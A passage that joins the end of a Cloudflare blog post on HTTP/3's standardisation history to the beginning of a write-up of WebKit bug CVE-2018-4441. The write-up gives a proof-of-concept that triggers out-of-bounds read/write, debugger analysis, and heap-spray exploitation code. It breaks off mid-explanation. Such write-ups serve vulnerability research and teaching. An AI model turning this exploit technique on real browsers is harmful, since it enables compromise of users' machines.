This sits in the Historic category, which "is usually done to document ideas that were considered and discarded, or protocols that were already historic when it was decided to document them." according to the IETF. In this case it is advantageous to have an IETF-owned document that describes SSL 3.0 because it can be used as a canonical reference elsewhere.

Of more interest to us is how SSL inspired the development of TLS, which began life as draft-ietf-tls-protocol-00 in November 1996. This went through 6 draft versions and was published as RFC 2246 - TLS 1.0 at the start of 1999.

Between 1995 and 1999, the SSL and TLS protocols were used to secure HTTP communications on the Internet. This worked just fine as a de facto standard. It wasn't until January 1998 that the formal standardisation process for HTTPS was started with the publication of I-D draft-ietf-tls-https-00. That work concluded in May 2000 with the publication of RFC 2818 - HTTP Over TLS.

TLS continued to evolve between 2000 and 2007, with the standardisation of TLS 1.1 and 1.2. There was a gap of 7 years until work began on the next version of TLS, which was adopted as draft-ietf-tls-tls13-00 in April 2014 and, after 28 drafts, completed as RFC 8446 - TLS 1.3 in August 2018.

Internet standardisation process

After taking a small look at the timeline, I hope you can build a sense of how the IETF works. One generalisation for the way that Internet standards take shape is that researchers or engineers design experimental protocols that suit their specific use case. They experiment with protocols, in public or private, at various levels of scale. The data helps to identify improvements or issues. The work may be published to explain the experiment, to gather wider input or to help find other implementers. Take up of this early work by others may make it a de facto standard; eventually there may be sufficient momentum that formal standardisation becomes an option.
The status of a protocol can be an important consideration for organisations that may be thinking about implementing, deploying or in some way using it. A formal standardisation process can make a de facto standard more attractive because it tends to provide stability. The stewardship and guidance is provided by an organisation, such as the IETF, that reflects a wider range of experiences. However, it is worth highlighting that not all formal standards succeed.

The process of creating a final standard is almost as important as the standard itself. Taking an initial idea and inviting contribution from people with wider knowledge, experience and use cases can help produce something that will be of more use to a wider population. However, the standardisation process is not always easy. There are pitfalls and hurdles. Sometimes the process takes so long that the output is no longer relevant.

Each Standards Defining Organisation tends to have its own process that is geared around its field and participants. Explaining all of the details about how the IETF works is well beyond the scope of this blog. The IETF's "How we work" page is an excellent starting point that covers many aspects. The best method of forming understanding, as usual, is to get involved yourself. This can be as easy as joining an email list or adding to discussion on a relevant GitHub repository.

Cloudflare's running code

Cloudflare is proud to be an early adopter of new and evolving protocols. We have a long record of adopting new standards early, such as HTTP/2. We also test features that are experimental or yet to be final, like TLS 1.3 and SPDY. In relation to the IETF standardisation process, deploying this running code on real networks across a diverse body of websites helps us understand how well the protocol will work in practice.
We combine our existing expertise with experimental information to help improve the running code and, where it makes sense, feed back issues or improvements to the WG that is standardising a protocol.

Testing new things is not the only priority. Part of being an innovator is knowing when it is time to move forward and put older innovations in the rear-view mirror. Sometimes this relates to security-oriented protocols; for example, Cloudflare disabled SSLv3 by default due to the POODLE vulnerability. In other cases, protocols become superseded by a more technologically advanced one; Cloudflare deprecated SPDY support in favour of HTTP/2.

The introduction and deprecation of relevant protocols are represented on the Secure Web Timeline as orange lines. Dotted vertical lines help correlate Cloudflare events to relevant IETF documents. For example, Cloudflare introduced TLS 1.3 support in September 2016, with the final document, RFC 8446, being published almost two years later in August 2018.

Refactoring in HTTPbis

HTTP/1.1 is a very successful protocol and the timeline shows that there wasn't much activity in the IETF after 1999. However, the true reflection is that years of active use gave implementation experience that unearthed latent problems with RFC 2616, which caused some interoperability issues. Furthermore, the protocol was extended by other RFCs like 2817 and 2818. It was decided in 2007 to kickstart a new activity to improve the HTTP protocol specification. This was called HTTPbis (where "bis" stems from Latin meaning "two", "twice" or "repeat") and it took the form of a new Working Group. The original charter does a good job of describing the problems that were trying to be solved.

In short, HTTPbis decided to refactor RFC 2616. It would incorporate errata fixes and buy in some aspects of other specifications that had been published in the meantime. It was decided to split the document up into parts.
This resulted in 6 I-Ds published in December 2007:

draft-ietf-httpbis-p1-messaging
draft-ietf-httpbis-p2-semantics
draft-ietf-httpbis-p4-conditional
draft-ietf-httpbis-p5-range
draft-ietf-httpbis-p6-cache
draft-ietf-httpbis-p7-auth

The diagram shows how this work progressed through a lengthy drafting process of 7 years, with 27 draft versions being released, before final standardisation. In June 2014, the so-called RFC 723x series was released (where x ranges from 0 to 5). The Chair of the HTTPbis WG celebrated this achievement with the acclamation "RFC2616 is Dead". If it wasn't clear, these new documents obsoleted the older RFC 2616.

What does any of this have to do with HTTP/3?

While the IETF was busy working on the RFC 723x series the world didn't stop. People continued to enhance, extend and experiment with HTTP on the Internet. Among them were Google, who had started to experiment with something called SPDY (pronounced speedy). This protocol was touted as improving the performance of web browsing, a principal use case for HTTP. At the end of 2009 SPDY v1 was announced, and it was quickly followed by SPDY v2 in 2010.

I want to avoid going into the technical details of SPDY. That's a topic for another day. What is important is to understand that SPDY took the core paradigms of HTTP and modified the interchange format slightly in order to gain improvements. With hindsight, we can see that HTTP has clearly delimited semantics and syntax. Semantics describe the concept of request and response exchanges including: methods, status codes, header fields (metadata) and bodies (payload). Syntax describes how to map semantics to bytes on the wire.

HTTP/0.9, 1.0 and 1.1 share many semantics. They also share syntax in the form of character strings that are sent over TCP connections. SPDY took HTTP/1.1 semantics and changed the syntax from strings to binary. This is a really interesting topic but we will go no further down that rabbit hole today.
Google's experiments with SPDY showed that there was promise in changing HTTP syntax, and value in keeping the existing HTTP semantics. For example, keeping the format of URLs to use https:// avoided many problems that could have affected adoption. Having seen some of the positive outcomes, the IETF decided it was time to consider what HTTP/2.0 might look like. The slides from the HTTPbis session held during IETF 83 in March 2012 show the requirements, goals and measures of success that were set out. They also clearly state that "HTTP/2.0 only signifies that the wire format isn't compatible with that of HTTP/1.x". During that meeting the community was invited to share proposals. I-Ds that were submitted for consideration included draft-mbelshe-httpbis-spdy-00, draft-montenegro-httpbis-speed-mobility-00 and draft-tarreau-httpbis-network-friendly-00. Ultimately, the SPDY draft was adopted and in November 2012 work began on draft-ietf-httpbis-http2-00. After 18 drafts across a period of just over 2 years, RFC 7540 - HTTP/2 was published in 2015. During this specification period, the precise syntax of HTTP/2 diverged just enough to make HTTP/2 and SPDY incompatible.

These years were a very busy period for the HTTP-related work at the IETF, with the HTTP/1.1 refactor and HTTP/2 standardisation taking place in parallel. This is in stark contrast to the many years of quiet in the early 2000s. Be sure to check out the full timeline to really appreciate the amount of work that took place.

Although HTTP/2 was in the process of being standardised, there was still benefit to be had from using and experimenting with SPDY. Cloudflare introduced support for SPDY in August 2012 and only deprecated it in February 2018, when our statistics showed that less than 4% of Web clients continued to want SPDY.
Meanwhile, we introduced HTTP/2 support in December 2015, not long after the RFC was published, when our analysis indicated that a meaningful proportion of Web clients could take advantage of it. Web client support of the SPDY and HTTP/2 protocols preferred the secure option of using TLS. The introduction of Universal SSL in September 2014 helped ensure that all websites signed up to Cloudflare were able to take advantage of these new protocols as we introduced them.

gQUIC

Google continued to experiment: between 2012 and 2015 it released SPDY v3 and v3.1. It also started working on gQUIC (pronounced, at the time, as quick), and the initial public specification was made available in early 2012. The early versions of gQUIC made use of the SPDY v3 form of HTTP syntax. This choice made sense because HTTP/2 was not yet finished. The SPDY binary syntax was packaged into QUIC packets that could be sent in UDP datagrams. This was a departure from the TCP transport that HTTP traditionally relied on. When stacked up all together this looked like:

[Figure: the SPDY over gQUIC layer cake]

gQUIC used clever tricks to achieve performance. One of these was to break the clear layering between application and transport. What this meant in practice was that gQUIC only ever supported HTTP. So much so that gQUIC, termed "QUIC" at the time, was synonymous with being the next candidate version of HTTP. Despite the continued changes to QUIC over the last few years, which we'll touch on momentarily, to this day the term QUIC is understood by people to mean that initial HTTP-only variant. Unfortunately this is a regular source of confusion when discussing the protocol. gQUIC continued to experiment and eventually switched over to a syntax much closer to HTTP/2. So close in fact that most people simply called it "HTTP/2 over QUIC". However, because of technical constraints there were some very subtle differences. One example relates to how the HTTP headers were serialized and exchanged.
It is a minor difference but in effect means that HTTP/2 over gQUIC was incompatible with the IETF's HTTP/2. Last but not least, we always need to consider the security aspects of Internet protocols. gQUIC opted not to use TLS to provide security. Instead Google developed a different approach called QUIC Crypto. One of the interesting aspects of this was a new method for speeding up security handshakes. A client that had previously established a secure session with a server could reuse information to do a "zero round-trip time", or 0-RTT, handshake. 0-RTT was later incorporated into TLS 1.3. Are we at the point where you can tell me what HTTP/3 is yet? Almost. By now you should be familiar with how standardisation works and gQUIC is not much different. There was sufficient interest that the Google specifications were written up in I-D format. In June 2015 draft-tsvwg-quic-protocol-00, entitled "QUIC: A UDP-based Secure and Reliable Transport for HTTP/2" was submitted. Keep in mind my earlier statement that the syntax was almost-HTTP/2. Google announced that a Bar BoF would be held at IETF 93 in Prague. For those curious about what a "Bar BoF" is, please consult RFC 6771. Hint: BoF stands for Birds of a Feather. The outcome of this engagement with the IETF was, in a nutshell, that QUIC seemed to offer many advantages at the transport layer and that it should be decoupled from HTTP. The clear separation between layers should be re-introduced. Furthermore, there was a preference for returning back to a TLS-based handshake (which wasn't so bad since TLS 1.3 was underway at this stage, and it was incorporating 0-RTT handshakes). About a year later, in 2016, a new set of I-Ds were submitted: draft-hamilton-quic-transport-protocol-00 draft-thomson-quic-tls-00 draft-iyengar-quic-loss-recovery-00 draft-shade-quic-http2-mapping-00 Here's where another source of confusion about HTTP and QUIC enters the fray. 
draft-shade-quic-http2-mapping-00 is entitled "HTTP/2 Semantics Using The QUIC Transport Protocol" and it describes itself as "a mapping of HTTP/2 semantics over QUIC". However, this is a misnomer. HTTP/2 was about changing syntax while maintaining semantics. Furthermore, "HTTP/2 over gQUIC" was never an accurate description of the syntax either, for the reasons I outlined earlier. Hold that thought.

This IETF version of QUIC was to be an entirely new transport protocol. That's a large undertaking and before diving head-first into such commitments, the IETF likes to gauge actual interest from its members. To do this, a formal Birds of a Feather meeting was held at the IETF 96 meeting in Berlin in 2016. I was lucky enough to attend the session in person and the slides don't do it justice. The meeting was attended by hundreds, as shown by Adam Roach's photograph. At the end of the session consensus was reached: QUIC would be adopted and standardised at the IETF.

The first IETF QUIC I-D for mapping HTTP to QUIC, draft-ietf-quic-http-00, took the Ronseal approach and simplified its name to "HTTP over QUIC". Unfortunately, it didn't finish the job completely and there were many instances of the term HTTP/2 throughout the body. Mike Bishop, the I-D's new editor, identified this and started to fix the HTTP/2 misnomer. In the 01 draft, the description changed to "a mapping of HTTP semantics over QUIC". Gradually, over time and versions, the use of the term "HTTP/2" decreased and the instances became mere references to parts of RFC 7540. Roll forward two years to October 2018 and the I-D is now at version 16. While HTTP over QUIC bears similarity to HTTP/2, it ultimately is an independent, non-backwards compatible HTTP syntax. However, to those that don't track IETF development very closely (a very, very large percentage of the Earth's population), the document name doesn't capture this difference.
One of the main points of standardisation is to aid communication and interoperability. Yet a simple thing like naming is a major contributor to confusion in the community. Recall what was said in 2012, "HTTP/2.0 only signifies that the wire format isn't compatible with that of HTTP/1.x". The IETF followed that existing cue. After much deliberation in the lead up to, and during, IETF 103, consensus was reached to rename "HTTP over QUIC" to HTTP/3. The world is now in a better place and we can move on to more important debates.

But RFC 7230 and 7231 disagree with your definition of semantics and syntax!

Sometimes document titles can be confusing. The present HTTP documents that describe syntax and semantics are:

RFC 7230 - Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing
RFC 7231 - Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content

It is possible to read too much into these names and believe that fundamental HTTP semantics are specific to versions of HTTP, i.e. HTTP/1.1. However, this is an unintended side effect of the HTTP family tree. The good news is that the HTTPbis Working Group are trying to address this. Some brave members are going through another round of document revision, as Roy Fielding put it, "one more time!". This work is underway right now and is known as the HTTP Core activity (you may also have heard of this under the moniker HTTPtre or HTTPter; naming things is hard). This will condense the six drafts down to three:

HTTP Semantics (draft-ietf-httpbis-semantics)
HTTP Caching (draft-ietf-httpbis-caching)
HTTP/1.1 Message Syntax and Routing (draft-ietf-httpbis-messaging)

Under this new structure, it becomes more evident that HTTP/2 and HTTP/3 are syntax definitions for the common HTTP semantics. This doesn't mean they don't have their own features beyond syntax, but it should help frame discussion going forward.
Pulling it all together

This blog post has taken a shallow look at the standardisation process for HTTP in the IETF across the last three decades. Without touching on many technical details, I've tried to explain how we have ended up with HTTP/3 today. If you skipped the good bits in the middle and are looking for a one-liner, here it is: HTTP/3 is just a new HTTP syntax that works on IETF QUIC, a UDP-based multiplexed and secure transport. There are many interesting technical areas to explore further but that will have to wait for another day.

In the course of this post, we explored important chapters in the development of HTTP and TLS but did so in isolation. We close out the blog by pulling them all together into the complete Secure Web Timeline presented below. You can use this to investigate the detailed history at your own leisure. And for the super sleuths, be sure to check out the full version including draft numbers.

Sursa: https://blog.cloudflare.com/http-3-from-root-to-tip/
14. CVE-2018-4441: OOB R/W via JSArray::unshiftCountWithArrayStorage (WebKit)

Feb 15, 2019

In this write-up, we'll be going through the ins and outs of CVE-2018-4441, which was reported by lokihardt of Google Project Zero.

Overview

bool JSArray::shiftCountWithArrayStorage(VM& vm, unsigned startIndex, unsigned count, ArrayStorage* storage)
{
    unsigned oldLength = storage->length();
    RELEASE_ASSERT(count <= oldLength);

    // If the array contains holes or is otherwise in an abnormal state,
    // use the generic algorithm in ArrayPrototype.
    if ((storage->hasHoles() && this->structure(vm)->holesMustForwardToPrototype(vm, this))
        || hasSparseMap()
        || shouldUseSlowPut(indexingType())) {
        return false;
    }

    if (!oldLength)
        return true;

    unsigned length = oldLength - count;

    storage->m_numValuesInVector -= count;
    storage->setLength(length);
    // [...]

Considering the comment, I think the method is supposed to prevent an array with holes from going through to the code "storage->m_numValuesInVector -= count". But such arrays can actually get there by merely having the holesMustForwardToPrototype method return false. Unless the array has any indexed accessors on it or Proxy objects in the prototype chain, the method will just return false. So "storage->m_numValuesInVector" can be controlled by the user. In the PoC, it changes m_numValuesInVector to 0xfffffff0, which equals the new length, making the hasHoles method return false and leading to OOB reads/writes in the JSArray::unshiftCountWithArrayStorage method.
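The underflow at the heart of the bug is plain unsigned 32-bit arithmetic. A quick Python sketch (modelling the C unsigned subtraction with an explicit mask) shows how deleting 0x11 elements turns an m_numValuesInVector of 1 into 0xfffffff0:

```python
# m_numValuesInVector is an unsigned 32-bit field; C unsigned subtraction
# wraps modulo 2**32, which we model with an explicit mask.
m_numValuesInVector = 1      # one value in the vector before the splice
count = 0x11                 # splice(0, 0x11) shifts out 0x11 elements
m_numValuesInVector = (m_numValuesInVector - count) & 0xFFFFFFFF
print(hex(m_numValuesInVector))  # -> 0xfffffff0
```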
PoC

function main() {
    // [1]
    let arr = [1];

    // [2]
    arr.length = 0x100000;

    // [3]
    arr.splice(0, 0x11);

    // [4]
    arr.length = 0xfffffff0;

    // [5]
    arr.splice(0xfffffff0, 0, 1);
}

main();

Root Cause Analysis

Running the PoC inside a debugger, we see that the binary crashes while trying to write to non-writable memory (EXC_BAD_ACCESS):

(lldb) r
Process 3018 launched: './jsc' (x86_64)
Process 3018 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x18000fe638)
    frame #0: 0x0000000100af8cd3 JavaScriptCore`JSC::JSArray::unshiftCountWithArrayStorage(JSC::ExecState*, unsigned int, unsigned int, JSC::ArrayStorage*) + 675
JavaScriptCore`JSC::JSArray::unshiftCountWithArrayStorage:
->  0x100af8cd3 <+675>: movq $0x0, 0x10(%r13,%rdi,8)
    0x100af8cdc <+684>: incq %rcx
    0x100af8cdf <+687>: incq %rdx
    0x100af8ce2 <+690>: jne 0x100af8cd0 ; <+672>
Target 0: (jsc) stopped.
(lldb) p/x $r13
(unsigned long) $4 = 0x00000010000fe6a8
(lldb) p/x $rdi
(unsigned long) $5 = 0x00000000fffffff0
(lldb) memory region $r13+($rdi*8)
[0x00000017fa800000-0x0000001802800000) ---
(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x18000fe638)
  * frame #0: 0x0000000100af8cd3 JavaScriptCore`JSC::JSArray::unshiftCountWithArrayStorage(JSC::ExecState*, unsigned int, unsigned int, JSC::ArrayStorage*) + 675
    frame #1: 0x0000000100af8fc7 JavaScriptCore`JSC::JSArray::unshiftCountWithAnyIndexingType(JSC::ExecState*, unsigned int, unsigned int) + 215
    frame #2: 0x0000000100a6a1d5 JavaScriptCore`void JSC::unshift<(JSC::JSArray::ShiftCountMode)1>(JSC::ExecState*, JSC::JSObject*, unsigned int, unsigned int, unsigned int, unsigned int) + 181
    frame #3: 0x0000000100a61c4b JavaScriptCore`JSC::arrayProtoFuncSplice(JSC::ExecState*) + 4267
    [...]

To be more precise, the crash occurs in the following loop in JSArray::unshiftCountWithArrayStorage, where it tries to clear (zero-initialize) the added vector's elements:

// [...]
for (unsigned i = 0; i < count; i++) vector[i + startIndex].clear(); // [...] startIndex ($rdi) is 0xfffffff0, vector ($r13) points to 0x10000fe6a8 and the resulting offset leads to a non-writable address, hence the crash. PoC Analysis // [1] let arr = [1] // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6b0 // - Type: ArrayWithInt32 // - public length: 1 // - vector length: 1 Initially, create an array of type ArrayWithInt32. It can hold any kind of elements (such as objects or doubles) but it still doesn’t have an associated ArrayStorage or holes. The WebKit project gives a nice overview of the different array storage methods. In short, a JSArray without an ArrayStorage will have a butterfly structure of the following form: --==[[ JSArray (lldb) x/2gx -l1 0x107bb4340 0x107bb4340: 0x0108211500000062 <--- JSC::JSCell [*] 0x107bb4348: 0x00000010000fe6b0 <--- JSC::AuxiliaryBarrier<JSC::Butterfly *> m_butterfly +0 { 16} JSArray +0 { 16} JSC::JSNonFinalObject +0 { 16} JSC::JSObject [*] 01 08 21 15 00000062 +0 { 8} JSC::JSCell | | | | | +0 { 1} JSC::HeapCell | | | | +-------- +0 < 4> JSC::StructureID m_structureID; | | | +----------- +4 < 1> JSC::IndexingType m_indexingTypeAndMisc; | | +-------------- +5 < 1> JSC::JSType m_type; | +----------------- +6 < 1> JSC::TypeInfo::InlineTypeFlags m_flags; +-------------------- +7 < 1> JSC::CellState m_cellState; +8 < 8> JSC::AuxiliaryBarrier<JSC::Butterfly *> m_butterfly; +8 < 8> JSC::Butterfly * m_value; --==[[ Butterfly (lldb) x/2gx -l1 0x00000010000fe6b0-8 0x10000fe6a8: 0x0000000100000001 <--- JSC::IndexingHeader [*] 0x10000fe6b0: 0xffff000000000001 <--- arr[0] 0x10000fe6b8: 0x00000000badbeef0 <--- JSC::Scribble (uninitialized memory) [*] 00000001 00000001 | | | +-------- uint32_t JSC::IndexingHeader.u.lengths.publicLength +----------------- uint32_t JSC::IndexingHeader.u.lengths.vectorLength // [2] arr.length = 0x100000 // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6e8 // - Type: ArrayWithArrayStorage // - public 
length: 0x100000 // - vector length: 1 // - m_numValuesInVector: 1 Next, set its length to 0x100000 and transision the array to an ArrayWithArrayStorage. Actually, setting the length of an array to anything greater than or equal to MIN_SPARSE_ARRAY_INDEX would transform it to ArrayWithArrayStorage. Additionally, just notice how the butterfly of an array with ArrayStorage points to the ArrayStorage instead of the first index of the array. --==[[ Butterfly (lldb) x/5gx -l1 0x00000010000fe6e8-8 0x10000fe6e0: 0x0000000100100000 <--- JSC::IndexingHeader 0x10000fe6e8: 0x0000000000000000 \___ JSC::ArrayStorage [*] 0x10000fe6f0: 0x0000000100000000 / 0x10000fe6f8: 0xffff000000000001 <--- m_vector[0], arr[0] 0x10000fe700: 0x00000000badbeef0 <--- JSC::Scribble (uninitialized memory) +0 { 24} ArrayStorage [*] 0000000000000000 --- +0 < 8> JSC::WriteBarrier<JSC::SparseArrayValueMap, WTF::DumbPtrTraits<JSC::SparseArrayValueMap> > m_sparseMap; 0000000100000000 +0 { 8} JSC::WriteBarrierBase<JSC::SparseArrayValueMap, WTF::DumbPtrTraits<JSC::SparseArrayValueMap> > | | +0 < 8> JSC::WriteBarrierBase<JSC::SparseArrayValueMap, WTF::DumbPtrTraits<JSC::SparseArrayValueMap> >::StorageType m_cell; | +----------- +8 < 4> unsigned int m_indexBias; +------------------- +12 < 4> unsigned int m_numValuesInVector; +16 < 8> JSC::WriteBarrier<JSC::Unknown, WTF::DumbValueTraits<JSC::Unknown> > [1] m_vector; // [3] arr.splice(0, 0x11) // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6e8 // - Type: ArrayWithArrayStorage // - public length: 0xfffef // - vector length: 1 // - m_numValuesInVector: 0xfffffff0 JavaScriptCore implements splice using shift and unshift operations and decides between the two based on itemCount and actualDeleteCount. EncodedJSValue JSC_HOST_CALL arrayProtoFuncSplice(ExecState* exec) { // [...] unsigned actualStart = argumentClampedIndexFromStartOrEnd(exec, 0, length); // [...] 
unsigned actualDeleteCount = length - actualStart;
if (exec->argumentCount() > 1) {
    double deleteCount = exec->uncheckedArgument(1).toInteger(exec);
    RETURN_IF_EXCEPTION(scope, encodedJSValue());
    if (deleteCount < 0)
        actualDeleteCount = 0;
    else if (deleteCount > length - actualStart)
        actualDeleteCount = length - actualStart;
    else
        actualDeleteCount = static_cast<unsigned>(deleteCount);
}
// [...]
unsigned itemCount = std::max<int>(exec->argumentCount() - 2, 0);
if (itemCount < actualDeleteCount) {
    shift<JSArray::ShiftCountForSplice>(exec, thisObj, actualStart, actualDeleteCount, itemCount, length);
    RETURN_IF_EXCEPTION(scope, encodedJSValue());
} else if (itemCount > actualDeleteCount) {
    unshift<JSArray::ShiftCountForSplice>(exec, thisObj, actualStart, actualDeleteCount, itemCount, length);
    RETURN_IF_EXCEPTION(scope, encodedJSValue());
}
// [...]
}

Thus, calling splice with itemCount < actualDeleteCount will eventually invoke JSArray::shiftCountWithArrayStorage.

bool JSArray::shiftCountWithArrayStorage(VM& vm, unsigned startIndex, unsigned count, ArrayStorage* storage)
{
    // [...]
    // If the array contains holes or is otherwise in an abnormal state,
    // use the generic algorithm in ArrayPrototype.
    if ((storage->hasHoles() && this->structure(vm)->holesMustForwardToPrototype(vm, this))
        || hasSparseMap()
        || shouldUseSlowPut(indexingType())) {
        return false;
    }
    // [...]
    storage->m_numValuesInVector -= count;
    // [...]
}

As is also mentioned in the original bug report, assuming the array has neither indexed accessors nor any Proxy objects in the prototype chain, holesMustForwardToPrototype will return false and storage->m_numValuesInVector -= count will be called. In our case, count is equal to 0x11 and, prior to the subtraction, m_numValuesInVector is equal to 1, resulting in 0xfffffff0 as the final value.
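To keep track of which splice path each PoC step takes, here is a small Python model of the dispatch logic above. It is a simplification of arrayProtoFuncSplice that ignores exceptions and sparse handling, keeping only the argument clamping and the shift/unshift choice:

```python
def splice_path(length, start, delete_count, item_count):
    # Mirrors the (simplified) dispatch in arrayProtoFuncSplice:
    actual_start = min(start, length)
    actual_delete = max(0, min(delete_count, length - actual_start))
    if item_count < actual_delete:
        return "shift"      # -> shiftCountWithArrayStorage
    if item_count > actual_delete:
        return "unshift"    # -> unshiftCountWithArrayStorage
    return "in-place"

# Step [3]: arr.splice(0, 0x11) on a length-0x100000 array
print(splice_path(0x100000, 0, 0x11, 0))          # shift
# Step [5]: arr.splice(0xfffffff0, 0, 1) on a length-0xfffffff0 array
print(splice_path(0xFFFFFFF0, 0xFFFFFFF0, 0, 1))  # unshift
```

Step [3] therefore drives the m_numValuesInVector underflow via the shift path, while step [5] later steers execution into the unshift path where the OOB access happens.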
// [4] arr.length = 0xfffffff0 // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6e8 // - Type: ArrayWithArrayStorage // - public length: 0xfffffff0 // - vector length: 1 // - m_numValuesInVector: 0xfffffff0 At this point the value of m_numValuesInVector is under control. By setting the publicLength of the array to the value of m_numValuesInVector, hasHoles can be controlled as well. bool hasHoles() const { return m_numValuesInVector != length(); } It is worth mentioning that our control over m_numValuesInVector is very limited and is tightly related to the OOB read/write that will be discussed in more detail later. // [5] arr.splice(0xfffffff0, 0, 1) Finally splice is called with itemCount > actualDeleteCount in order to trigger unshift instead of shift. hasHoles returns false and we get OOB r/w in JSArray::unshiftCountWithArrayStorage. Exploitation Our plan is to leverage memmove in JSArray::unshiftCountWithArrayStorage into achieving addrof and fakeobj primitives. But before we do that, we have to set out an overall plan. There are three if-cases before the memmove call. bool JSArray::unshiftCountWithArrayStorage(ExecState* exec, unsigned startIndex, unsigned count, ArrayStorage* storage) { // [...] 
bool moveFront = !startIndex || startIndex < length / 2;

// [1]
if (moveFront && storage->m_indexBias >= count) {
    Butterfly* newButterfly = storage->butterfly()->unshift(structure(vm), count);
    storage = newButterfly->arrayStorage();
    storage->m_indexBias -= count;
    storage->setVectorLength(vectorLength + count);
    setButterfly(vm, newButterfly);
// [2]
} else if (!moveFront && vectorLength - length >= count)
    storage = storage->butterfly()->arrayStorage();
// [3]
else if (unshiftCountSlowCase(locker, vm, deferGC, moveFront, count))
    storage = arrayStorage();
else {
    throwOutOfMemoryError(exec, scope);
    return true;
}

WriteBarrier<Unknown>* vector = storage->m_vector;

if (startIndex) {
    if (moveFront)
        // [4]
        memmove(vector, vector + count, startIndex * sizeof(JSValue));
    else if (length - startIndex)
        // [5]
        memmove(vector + startIndex + count, vector + startIndex, (length - startIndex) * sizeof(JSValue));
}
// [...]
}

Initially, we discarded cases [1] and [3], since they'll reallocate the current butterfly, leading to what we (wrongfully) assumed would be an unreliable memmove, on the grounds that we couldn't predict (it turns out we can) where the newly allocated butterfly will land. With that in mind, we moved on with [2], but quickly stumbled upon a dead end. If we were to take that route, we'd have to make moveFront false. To do that, startIndex has to be non-zero and greater than or equal to length/2. This ends up being a bummer because [4] will copy at least length/2 * 8 bytes. That's a pretty gigantic number if you recall how we got to that code path in the first place. To cut to the chase, right after the memmove call we got a crash. We didn't investigate the root cause any further, but since we memmove a big amount of memory, we believe some objects/structures adjacent to the butterfly are corrupted. Maybe by spraying a bunch of 0x100000 size JSArrays you could get around that, maybe not. We thought it was too dirty and abandoned the idea.
Spray to slay

At that point, we decided to browse through older exploits. niklasb came to the rescue with his exploit. In short, his code makes holes of certain size objects in the heap and reliably allocates them back. That felt ideal for [1] and [3]. Here's how we adapted that approach to meet our exploitation criteria:

let SPRAY_SIZE = 0x3000;

// [a]
let spray = new Array(SPRAY_SIZE);

// [b]
for (let i = 0; i < 0x3000; i += 3) {
    // ArrayWithDouble, will allocate 0x60, will be free'd
    spray[i] = [13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37+i];
    // ArrayWithContiguous, will allocate 0x60, will be corrupted for fakeobj
    spray[i+1] = [{},{},{},{},{},{},{},{},{},{}];
    // ArrayWithDouble, will allocate 0x60, will be corrupted for addrof
    spray[i+2] = [13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37+i];
}

// [c]
for (let i = 0; i < 1000; i += 3)
    spray[i] = null;

// [d]
gc();

// [e]
for (let i = 0; i < SPRAY_SIZE; i += 3)
    // corrupt butterfly's length field
    spray[i+1][0] = i2f(1337)

What we're practically doing is [a] create an array, [b] root a bunch of arrays of a certain size in it, [c] remove the references to them and finally [d] trigger gc, resulting in heap holes of that size. We use this logic in our exploit in order to get a reallocated butterfly literally next to a victim/sprayed object of ours that we wish to corrupt. In case you didn't notice, each spray index is a JSArray of size 10. Why 10? After a couple of test runs, while debugging all the way to the butterfly allocation in Butterfly::tryCreateUninitialized, we ended up with arr.splice(1000, 1, 1, 1). We noticed that the reallocated size will be 0x58 (rounded up to 0x60). This is the exact size of a JSArray whose butterfly holds 10 elements. Let's visualize how that spray looks in memory.

...
+0x0000: 0x0000000d0000000a ----------+ +0x0000: 0x402abd70a3d70a3d | +0x0008: 0x402abd70a3d70a3d | +0x0010: 0x402abd70a3d70a3d | +0x0018: 0x402abd70a3d70a3d | +0x0020: 0x402abd70a3d70a3d spray[i], ArrayWithDouble +0x0028: 0x402abd70a3d70a3d | +0x0030: 0x402abd70a3d70a3d | +0x0038: 0x402abd70a3d70a3d | +0x0040: 0x402abd70a3d70a3d | +0x0048: 0x402abd70a3d70a3d ----------+ ... +0x0068: 0x0000000d0000000a ----------+ +0x0070: 0x00007fffaf7c83c0 | +0x0078: 0x00007fffaf7b0080 | +0x0080: 0x00007fffaf7b00c0 | +0x0088: 0x00007fffaf7b0100 | +0x0090: 0x00007fffaf7b0140 spray[i+1], ArrayWithContiguous +0x0098: 0x00007fffaf7b0180 | +0x00a0: 0x00007fffaf7b01c0 | +0x00a8: 0x00007fffaf7b0200 | +0x00b0: 0x00007fffaf7b0240 | +0x00b8: 0x00007fffaf7b0280 ----------+ ... +0x00d8: 0x0000000d0000000a ----------+ +0x00e0: 0x402abd70a3d70a3d | +0x00e8: 0x402abd70a3d70a3d | +0x00f0: 0x402abd70a3d70a3d | +0x00f8: 0x402abd70a3d70a3d | +0x0100: 0x402abd70a3d70a3d spray[i+2], ArrayWithDouble +0x0108: 0x402abd70a3d70a3d | +0x0110: 0x402abd70a3d70a3d | +0x0118: 0x402abd70a3d70a3d | +0x0120: 0x402abd70a3d70a3d | +0x0128: 0x402abd70a3d70a3d ----------+ ... The goal of [c] and [d] is to land a reallocated butterfly at spray. Note we have control of both startIndex and count. startIndex represents the index where we want to start adding/deleting elements and count represents the actual number of added elements. For instance, arr.splice(1000, 1, 1, 1) gives a startIndex of 1000 and a count of 1 (if you think about it, we delete 1 element and add [1,1], essentially adding one element). Indeed, it’d be quite convenient if we landed that idea. In particular, with those numbers at hand, the memmove call at [4] translates to this: // [...] WriteBarrier<Unknown>* vector = storage->m_vector; if (1000) { if (1) memmove(vector, vector + 1, 1000 * sizeof(JSValue)); } // [...] Essentially, we’ll be moving memory “backwards”. 
